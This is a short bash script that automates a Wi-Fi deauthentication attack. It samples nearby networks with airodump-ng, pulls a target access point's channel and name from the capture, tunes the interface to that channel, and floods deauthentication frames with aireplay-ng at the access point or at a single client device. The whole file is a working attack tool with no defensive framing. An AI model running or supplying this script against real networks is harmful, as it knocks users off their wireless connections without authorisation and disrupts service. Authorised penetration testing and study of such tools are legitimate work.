#!/bin/bash

source ./config.cfg
SCAN_TIME=$AUTO_SCAN_TIME
INJECTION_TIME=$AUTO_INJECTION_TIME

echo "Sampling wireless data"
rm tempdump*
airodump-ng -w tempdump --output-format csv --write-interval 3 --background 1 $IFACE & pid=$!
sleep $SCAN_TIME
kill "$pid"

echo "Preparing data"
mv tempdump-01.csv tempdump.csv
TARGET_CHANNEL=$(grep "$TARGET_BSSID" tempdump.csv | awk -F, '{sub(/^ *| *$/,"",$4); print $4}')

if [ -z "$TARGET_CHANNEL" ]; then
  echo "Target BSSID not found. Exiting."
  exit 1
fi

TARGET_CHANNEL="${TARGET_CHANNEL:0:2}"
TARGET_ESSID=$(grep "$TARGET_BSSID" tempdump.csv | awk -F, '{sub(/^ *| *$/,"",$4); print $14}')

echo "Automated channel targeting..."
echo "Target ESSID = $TARGET_ESSID"
echo "Target BSSID = $TARGET_BSSID"
echo "Target channel = $TARGET_CHANNEL"
echo "Injecting deAuth frame for $INJECTION_TIME second(s)"

iwconfig $IFACE channel $TARGET_CHANNEL

if [ -z "$TARGET_DEVICE" ]
then
	aireplay-ng -0 0 -a $TARGET_BSSID $IFACE --ignore-negative-one & pid=$!
	sleep $INJECTION_TIME
	kill "$pid"
else
    aireplay-ng -0 0 -a $TARGET_BSSID -c $TARGET_DEVICE $IFACE --ignore-negative-one & pid=$!
	sleep $INJECTION_TIME
	kill "$pid"
fi

echo "deAuth frame injection finished"